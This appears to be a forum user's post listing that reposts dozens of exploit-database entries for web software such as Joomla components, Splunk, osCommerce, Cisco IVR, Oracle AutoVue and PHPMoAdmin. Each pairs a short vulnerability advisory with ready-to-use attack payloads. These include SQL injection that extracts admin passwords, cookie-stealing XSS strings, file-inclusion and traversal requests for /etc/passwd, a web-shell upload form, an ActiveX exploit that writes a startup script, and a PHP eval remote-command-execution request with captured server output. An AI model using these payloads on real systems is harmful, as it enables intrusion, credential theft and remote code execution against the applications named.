
Everything posted by HireHackking
-
Jaws 0.8.14 - Multiple Remote File Inclusions
source: https://www.securityfocus.com/bid/50022/info

Jaws is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow a remote attacker to obtain sensitive information or execute arbitrary script code in the context of the Web server process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.

Jaws 0.8.14 is vulnerable; other versions may also be affected.

http://www.example.com/jaws/libraries/pear/MDB2.php?file_name=[RFI]
http://www.example.com/jaws/libraries/pear/Services/Weather.php?service=[RFI]
http://www.example.com/jaws/libraries/pear/SOAP/Transport.php?transport_include=[RFI]
http://www.example.com/jaws/libraries/pear/Crypt/RSA/MathLoader.php?class_filename=[RFI]
-
Joomla! Component com_tree - 'key' SQL Injection
source: https://www.securityfocus.com/bid/50041/info

The 'com_tree' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?option=com_tree&Itemid=11&key=-77 uNIOn select 0,version(),2--
-
GoAhead Web Server 2.18 - 'adduser.asp' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/50039/info

GoAhead WebServer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

GoAhead WebServer 2.18 is vulnerable; other versions may also be affected.

POST /goform/AddUser HTTP/1.1

user=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&group=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&enabled=on&password=test&passconf=test&ok=OK
-
Joomla! Component com_br - 'state_id' SQL Injection
source: https://www.securityfocus.com/bid/50042/info

The 'com_br' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?option=com_br&controller=resource&view=resource&task=resource_info&Itemid=8&state_id=-33 union select 0,1,version(),3
-
2Moons 1.4 - Multiple Remote File Inclusions
source: https://www.securityfocus.com/bid/50046/info

2Moons is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow a remote attacker to obtain sensitive information or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.

2Moons 1.4 is vulnerable; other versions may also be affected.

http://www.example.com/2Moons/CombatReport.php?RID=[EV!L]
http://www.example.com/2Moons/includes/common.php?UNI=[EV!L]
http://www.example.com/2Moons/includes/classes/class.FlyingFleetHandler.php?MissionsPattern[CurrentFleet[fleet_mission]]=[EV!L]
http://www.example.com/2Moons/includes/classes/class.FlyingFleetHandler.php?CurrentFleet[fleet_mission]]=[EV!L]
http://www.example.com/2Moons/includes/classes/class.Lang.php?Lang=[EV!L]
http://www.example.com/2Moons/includes/classes/class.Lang.php?File=[EV!L]
http://www.example.com/2Moons/includes/classes/class.Lang.php?LANGUAGE=[EV!L]
http://www.example.com/2Moons/includes/classes/class.Records.php?File=[EV!L]
http://www.example.com/2Moons/includes/pages/ShowTopKB.php?ReportID=[EV!L]
http://www.example.com/2Moons/includes/libs/Smarty/Smarty.class.php?file=[EV!L]
http://www.example.com/2Moons/includes/pages/adm/ShowModVersionPage.php?File=[EV!L]
http://www.example.com/2Moons/includes/libs/Smarty/sysplugins/smarty_internal_resource_php.php?_smarty_template=[EV!L]
http://www.example.com/2Moons/includes/libs/Smarty/sysplugins/smarty_internal_templatecompilerbase.php?file=[EV!L]
-
Joomla! Component com_shop - 'id' SQL Injection
source: https://www.securityfocus.com/bid/50043/info

The 'com_shop' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?option=com_shop&view=details&id=-29 union select 0,1,2,version(),4,5,6,7,8,9,10,11,12
-
6KBBS 8.0 build 20101201 - Cross-Site Scripting / Information Disclosure
source: https://www.securityfocus.com/bid/50050/info

6KBBS is prone to multiple cross-site scripting and information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

6KBBS 8.0 build 20101201 is vulnerable; other versions may also be affected.

http://www.example.com/credits.php?'[XSS]
http://www.example.com/forum.php?'[XSS]
http://www.example.com/index.php?'[XSS]
http://www.example.com/login.php?'[XSS]
http://www.example.com/online.php?'[XSS]
http://www.example.com/getfiles.php?f=http://xxx&t=js
http://www.example.com/admin/portalcollect.php?f=http://xxx&t=js
-
ContaoCMS 2.10.1 - Cross-Site Scripting
source: https://www.securityfocus.com/bid/50061/info

Contao is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Contao 2.10.1 is vulnerable; other versions may also be affected.

http://www.example.com/contao-2.10.1/index.php/teachers.html?"/><script>alert('xss')</script>
http://www.example.com/contao-2.10.1/index.php/teachers/'"</style></script><script>alert(document.cookie)</script>
-
SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/50063/info

SilverStripe is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

SilverStripe 2.4.5 is vulnerable; other versions may also be affected.

http://www.example.com/SilverStripe-v2.4.5/admin/reports/?'"</script><script>alert(document.cookie)</script>
http://www.example.com/SilverStripe-v2.4.5/admin/comments/?'"</script><script>alert(document.cookie)</script>
http://www.example.com/SilverStripe-v2.4.5/admin/?'"</script><script>alert(document.cookie)</script>
http://www.example.com/SilverStripe-v2.4.5/admin/show/4?'"</script><script>alert(document.cookie)</script>
http://www.example.com/SilverStripe-v2.4.5/admin/show/2?'"</script><script>alert(document.cookie)</script>
http://www.example.com/SilverStripe-v2.4.5/admin/show/root?'"</script><script>alert(document.cookie)</script>
http://www.example.com/SilverStripe-v2.4.5/admin/show/3?'"</script><script>alert(document.cookie)</script>
http://www.example.com/SilverStripe-v2.4.5/admin/show/?'"</script><script>alert(document.cookie)</script>
http://www.example.com/SilverStripe-v2.4.5/admin/assets/?'"</script><script>alert(document.cookie)</script>
http://www.example.com/SilverStripe-v2.4.5/admin/show/1?'"</script><script>alert(document.cookie)</script>
http://www.example.com/SilverStripe-v2.4.5/admin/show/5?'"</script><script>alert(document.cookie)</script>
http://www.example.com/SilverStripe-v2.4.5/admin/security/?'"</script><script>alert(document.cookie)</script>
-
BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/50083/info

BugFree is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

BugFree 2.1.3 is vulnerable; other versions may also be affected.

http://www.example.com/Bug.php?BugID=1&ActionType=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/Report.php?ReportMode=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/ReportLeft.php?ReportMode=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admin/AdminProjectList.php/%27;%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admin/AdminGroupList.php/%27;%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/admin/AdminUserLogList.php/%27;%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
-
Joomla! Component com_sgicatalog 1.0 - 'id' SQL Injection
source: https://www.securityfocus.com/bid/50072/info

The Sgicatalog component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Sgicatalog 1.0 is vulnerable; other versions may also be affected.

http://www.example.com/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi]
-
Boonex Dolphin 6.1 - 'get_list.php' SQL Injection
source: https://www.securityfocus.com/bid/50286/info

Boonex Dolphin is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Boonex Dolphin 6.1 is vulnerable; other versions may also be affected.

http://www.example.com/xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=(select 1 from AdminMenu where 1=1 group by concat((select password from Admins),rand(0)|0) having min(0) )
-
Innovate Portal 2.0 - 'cat' Cross-Site Scripting
source: https://www.securityfocus.com/bid/50295/info

Innovate Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/index.php?cat=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28948044%29%3c%2fScRiPt%3e&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound
-
Splunk 4.1.6 - 'segment' Cross-Site Scripting
source: https://www.securityfocus.com/bid/50296/info

Splunk is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Splunk versions 4.2.2 and prior are vulnerable.

http://www.example.com/en-US/prototype/segmentation_performance?lines=2&depth=2&segment=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&element=aaa&attribute=aaa&segmentation=flattened
-
osCommerce - Arbitrary File Upload / File Disclosure
source: https://www.securityfocus.com/bid/50301/info

osCommerce is prone to a remote file-upload vulnerability and a file-disclosure vulnerability. The issues occur because the application fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload a file and to obtain the contents of an arbitrary file; other attacks are also possible.

The following URL is available for the file-disclosure vulnerability:

http://www.example.com/admin/shop_file_manager.php/login.php/login.php?action=download&filename=/includes/_includes_configure.php

The following exploit is available for the remote file-upload vulnerability:

<html><head><title> creloaded - Remote File Upload </title></head>
<br><br><u>UPLOAD FILE:</u><br>
<form name="file" action="https://www.example.com/admin/shop_file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data">
<input type="file" name="file_1"><br>
<input name="submit" type="submit" value=" Upload " >
</form>
<br><u>CREATE FILE:</u><br>
<form name="new_file" action="https://www.example.com/admin/shop_file_manager.php/login.php?action=save" method="post">
FILE NAME:<br>
<input type="text" name="filename"> (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
<input name="submit" type="submit" value=" Save " >
</form>
-
Splunk 4.1.6 Web Component - Remote Denial of Service
source: https://www.securityfocus.com/bid/50298/info

Splunk is prone to a remote denial-of-service vulnerability. Exploiting this issue will exhaust system resources and cause the application to crash, denying service to legitimate users.

http://www.example.com/en-US/prototype/segmentation_performance?lines=999&depth=99999999&segment=foo&element=span&attribute=class&segmentation=nested
http://www.example.com/en-US/prototype/segmentation_performance?lines=99999999999999999999999999999999999999&depth=99999999999999999999999999999999999999&segment=foo&element=span&attribute=class&segmentation=nested
https://localhost/en-US/debug/sso
-
Tine 2.0 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/50307/info

Tine is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Tine 2.0 is vulnerable; other versions may also be affected.

http://www.example.com/library/idnaconvert/example.php?lang=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/library/idnaconvert/example.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/library/phpexcel/phpexcel/shared/jama/docs/download.php/%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
-
Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method
source: https://www.securityfocus.com/bid/50332/info

Oracle AutoVue 'AutoVueX.ocx' ActiveX control is prone to a vulnerability caused by an insecure method. Successfully exploiting this issue will allow attackers to create or overwrite arbitrary files on a victim's computer within the context of the affected application (typically Internet Explorer) that uses the ActiveX control.

Oracle AutoVue 20.0.1 is vulnerable; other versions may also be affected.

<!--
Oracle AutoVue AutoVueX ActiveX Control ExportEdaBom Remote Code Execution
ProgID: AUTOVUEX.AutoVueXCtrl.1
CLSID: {B6FCC215-D303-11D1-BC6C-0000C078797F}
Binary path: C:\PROGRA~1\av\avwin\AutoVueX.ocx
Safe for initialization (registry): true
Safe for scripting (registry): true
rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:B6FCC215-D303-11D1-BC6C-0000C078797F' id='obj' width=640 & height=480 />
<param name=SRC value="PADS_Evaluation_board.pcb"></param>
</object>
<script defer="defer">
var sh = "<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
for (i=0; i<6666; i++) {
  obj.ExportEdaBom("../../../../../../../../../../../Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\sh.hta","aaaa",true,sh);
}
window.location.href = window.location.href;
</script>
-
e107 0.7.24 - 'cmd' Remote Command Execution
source: https://www.securityfocus.com/bid/50339/info

e107 is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied input. An attacker can exploit this issue to execute arbitrary commands within the context of the vulnerable application.

e107 0.7.24 is vulnerable; other versions may also be affected.

http://www.example.com/e107_config.php?cmd=id
-
PHPMoAdmin - Unauthorized Remote Code Execution
######################################################################
#  _     ___  _   _  ____  ____    _  _____
# | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
# | |  | | | | \| | | |  _| |     / _ \ | |
# | |__| |_| | |\  | |_| | |___ / ___ \| |
# |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
# Website : http://www.phpmoadmin.com/
# Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
# Release dates : March 3, 2015
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################

[+] Description
============================================================
PHPMoAdmin is a MongoDB administration tool for PHP built on a stripped-down version of the Vork high-performance framework.

[+] Exploit
============================================================
Someone was trying to sell this shit for 3000usd lolz

$ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit"

[+] Proof-of-Concept
============================================================
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7

POST /moadmin/moadmin.php HTTP/1.1
Host: 192.168.33.10
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

object=1;system('id;ls -lha');exit

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 16:57:40 GMT
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 223
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 116K
drwxr-xr-x 1 longcat longcat  102 Mar  3 16:55 .
drwxr-xr-x 6 root    root    4.0K Mar  3 16:17 ..
-rw-rw-r-- 1 longcat longcat 112K Mar  3 16:55 moadmin.php

[+] Vulnerability Analysis
============================================================
Filename: moadmin.php

1. create new moadminComponent object

1977: $mo = new moadminComponent;

2. if the http-post parameter 'object' is set

738: class moadminComponent {
...
762: public function __construct() {
...
786: if (isset($_POST['object'])) {
787: if (self::$model->saveObject($_GET['collection'], $_POST['object'])) {
...

3. evaluate the value of 'object' as PHP code

692: public function saveObject($collection, $obj) {
693: eval('$obj=' . $obj . ';'); //cast from string to array
-
InverseFlow 2.4 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/50344/info

InverseFlow is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

InverseFlow 2.4 is vulnerable; other versions may also be affected.

http://www.example.com/inver/inverseflow/ticketview.php?email=[XSS]
http://www.example.com/inver/inverseflow/ticketview.php?email=&id=[XSS]
http://www.example.com/inver/inverseflow/login.php?redirect=[XSS]
-
Alsbtain Bulletin 1.5/1.6 - Multiple Local File Inclusions
source: https://www.securityfocus.com/bid/50350/info

Alsbtain Bulletin is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

Alsbtain Bulletin 1.5 and 1.6 are vulnerable; other versions may also be affected.

http://www.example.com/index.php?style=[LFI]%00
http://www.example.com/index.php?act=[LFI]%00
-
vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (2)
source: https://www.securityfocus.com/bid/50364/info

vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.

http://www.example.com/modules/mobile/index.php?_operation="><script>alert(1)</script>
http://www.example.com/modules/mobile/index.php?_operation=listModuleRecords&module=Services&search="><script>alert(1)</script>
-
XAMPP 1.7.4 - Cross-Site Scripting
source: https://www.securityfocus.com/bid/50381/info

XAMPP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

These issues affect XAMPP 1.7.4 for Windows and prior.

http://www.example.com/xampp/ming.php?text=[xss]
http://www.example.com/xampp/cds.php/[xss]
-
Cisco - 'file' Directory Traversal
source: https://www.securityfocus.com/bid/50372/info

Multiple Cisco products are prone to a directory-traversal vulnerability. Exploiting this issue will allow an attacker to read arbitrary files from locations outside of the application's current directory. This could help the attacker launch further attacks.

This issue is tracked by Cisco BugID CSCts44049 and CSCth09343.

The following products are affected:

Cisco Unified IP Interactive Voice Response
Cisco Unified Contact Center Express
Cisco Unified Communications Manager

http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../usr/local/platform/conf/platformConfig.xml